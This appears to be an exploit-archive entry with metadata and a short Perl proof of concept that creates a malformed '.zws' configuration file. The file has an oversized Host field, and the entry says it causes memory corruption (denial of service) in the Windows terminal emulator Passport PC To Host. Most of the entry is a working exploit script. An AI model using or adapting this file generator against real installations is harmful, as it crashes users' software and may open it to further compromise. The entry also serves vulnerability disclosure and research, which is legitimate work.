[] NeoSense

Passport PC To Host - '.zws' File Memory Corruption

Author: Silent_Dream
type: dos
platform: windows
port: 
date_added: 2012-03-03 
date_updated: 2012-03-03 
verified: 0 
codes: OSVDB-80072 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Passport PC To Host Malformed .zws file Memory Corruption
# Date: 3-3-12
# Author: Silent Dream
# Software Link: http://www.zephyrcorp.com/terminal-emulation/
# Version: Latest (2011-506-S)
# Tested on: Windows XP SP3

my $file = "passport_pwn.zws";
my $head = "[Connection]\nHost=";
my $junk = "a" x 150;
open($File, ">$file");
print $File $head.$junk;
close($FILE);